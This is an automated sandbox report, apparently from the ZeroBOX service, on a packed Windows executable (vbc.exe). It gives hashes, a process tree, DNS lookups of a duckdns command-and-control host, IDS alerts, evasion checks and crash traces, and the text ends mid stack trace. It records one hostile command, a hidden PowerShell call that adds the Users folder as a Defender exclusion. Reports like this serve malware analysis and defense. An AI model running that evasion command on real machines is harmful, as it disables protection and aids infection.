Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	May 24, 2022, 6:27 p.m.	May 24, 2022, 6:33 p.m.

Size	1020.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`f05a460e312d90267b12335c3c86e6a8`
SHA256	`8ba4a9f7596a9e12fc82290aca608ee81f0ed4e33e388257de62b0ce1a16b514`
CRC32	`40DDD0C6`
ssdeep	`12288:3sGDrsy7QD25IMRgmDBJzd4+vZiy80LlMXuuLp0rTXNlgPgBuLq:3sGnPIM9LpHVLspMQ4ML`
Yara	IsPE32 - (no description) UPX_Zero - UPX packed file Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature

vbc.exe "C:\Users\test22\AppData\Local\Temp\vbc.exe"
2352
- cmd.exe cmd /c ""C:\Users\Public\Libraries\Oywnaspt.bat" "
  2536
  - cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\Libraries\OywnaspO.bat
    2596
    - net.exe net session
      2680
      - net1.exe C:\Windows\system32\net1 session
        2724
    - powershell.exe powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
      2828

Name	Response	Post-Analysis Lookup
geoplugin.net	A 178.237.33.50	178.237.33.50
xxggqg.bn.files.1drv.com	CNAME odc-bn-files-geo.onedrive.akadns.net CNAME bn-files.fe.1drv.com CNAME odc-bn-files-brs.onedrive.akadns.net A 13.107.42.12 CNAME bn-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net CNAME l-0003.l-msedge.net	13.107.42.12
blackwealth001.duckdns.org	A 185.157.162.137
onedrive.live.com	CNAME odc-web-geo.onedrive.akadns.net CNAME l-0004.l-msedge.net A 13.107.42.13 CNAME odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net CNAME odc-web-brs.onedrive.akadns.net	13.107.42.13

IP Address	Status	Action
13.107.42.12	Active	Moloch
13.107.42.13	Active	Moloch
164.124.101.2	Active	Moloch
178.237.33.50	Active	Moloch
185.157.162.137	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49162 -> 13.107.42.13:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49163 -> 13.107.42.12:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.103:51958 -> 164.124.101.2:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:51958 -> 164.124.101.2:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:63462 -> 8.8.8.8:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:51958 -> 164.124.101.2:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:63462 -> 8.8.8.8:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:51958 -> 164.124.101.2:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:57573 -> 164.124.101.2:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:57573 -> 164.124.101.2:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:57573 -> 8.8.8.8:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:57573 -> 164.124.101.2:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:57573 -> 8.8.8.8:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:57573 -> 164.124.101.2:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:60693 -> 8.8.8.8:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:51958 -> 8.8.8.8:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:51958 -> 8.8.8.8:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:60693 -> 8.8.8.8:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:63462 -> 164.124.101.2:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:63462 -> 164.124.101.2:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:63462 -> 164.124.101.2:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:63462 -> 164.124.101.2:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:49347 -> 164.124.101.2:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:49347 -> 164.124.101.2:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:49347 -> 8.8.8.8:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:49347 -> 164.124.101.2:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:49347 -> 8.8.8.8:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:49347 -> 164.124.101.2:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:60556 -> 8.8.8.8:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:60556 -> 8.8.8.8:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:60556 -> 164.124.101.2:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:60556 -> 164.124.101.2:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:60556 -> 164.124.101.2:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
TCP 192.168.56.103:49164 -> 13.107.42.12:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.103:60693 -> 164.124.101.2:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:60693 -> 164.124.101.2:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:60693 -> 164.124.101.2:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.103:60693 -> 164.124.101.2:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49162 13.107.42.13:443	C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02	CN=onedrive.com	77:7f:f2:95:29:a7:e3:cc:0f:bf:2f:ba:2e:6f:2a:38:62:8b:48:4d
TLSv1 192.168.56.103:49163 13.107.42.12:443	C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02	C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com	c2:e0:68:f2:b8:12:58:f2:43:68:ba:74:5a:78:76:f9:19:2d:a1:60
TLS 1.3 192.168.56.103:49177 185.157.162.137:59085	None	None	None
TLSv1 192.168.56.103:49164 13.107.42.12:443	C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02	C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com	c2:e0:68:f2:b8:12:58:f2:43:68:ba:74:5a:78:76:f9:19:2d:a1:60

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 24, 2022, 6:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 24, 2022, 6:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 24, 2022, 6:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 24, 2022, 6:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 24, 2022, 6:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 24, 2022, 6:27 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 24, 2022, 6:27 p.m.			0	0

Command line console output was observed (4 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 24, 2022, 6:27 p.m.	buffer: C:\Users\Public\Libraries> console_handle: 0x00000007	1	1
WriteConsoleW May 24, 2022, 6:27 p.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW May 24, 2022, 6:27 p.m.	buffer: /min C:\Users\Public\Libraries\OywnaspO.bat console_handle: 0x00000007	1	1
WriteConsoleW May 24, 2022, 6:27 p.m.	buffer: exit console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (44 events)

Time & API	Arguments	Status	Return
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aa5f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aab70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aab70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aab70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aa6f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aa6f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aa6f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aa6f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aa6f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aa6f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aab70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aab70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aab70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aaa70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aaa70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aaa70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aa6b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aaa70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aaa70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aaa70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aaa70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aaa70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aaa70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aaa70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aa2f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aa2f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aa2f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aa2f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aa2f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aa2f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aa2f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aa2f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aa2f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aa2f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aa2f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aa2f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aa2f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aa2f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aaf70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aaf70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aaf70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aaf70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aaf70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004aaf70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 24, 2022, 6:27 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 events)

section	CODE
section	DATA
section	BSS

The executable uses a known packer (1 event)

packer

BobSoft Mini Delphi -> BoB / BobSoft

One or more processes crashed (50 out of 124 events)

Time & API	Arguments	Status
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x772e317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x772f199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x772f193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632820 registers.edi: 1632908 registers.eax: 23117 registers.ebp: 1632880 registers.edx: 0 registers.ebx: 0 registers.esi: 52232192 registers.ecx: 1632768	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x772df5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x772df560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x772f176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7730af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632672 registers.edi: 1632768 registers.eax: 23117 registers.ebp: 1632732 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1999575552	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x772e317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7730ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7730af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632804 registers.edi: 1632892 registers.eax: 23117 registers.ebp: 1632864 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1632768	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x772df5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x772df560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x772f176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632928 registers.edi: 1633024 registers.eax: 23117 registers.ebp: 1632988 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1999678976	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x772e317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x772f199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x772f193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632820 registers.edi: 1632908 registers.eax: 23117 registers.ebp: 1632880 registers.edx: 0 registers.ebx: 0 registers.esi: 52232192 registers.ecx: 1632768	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x772df5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x772df560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x772f176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7730af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 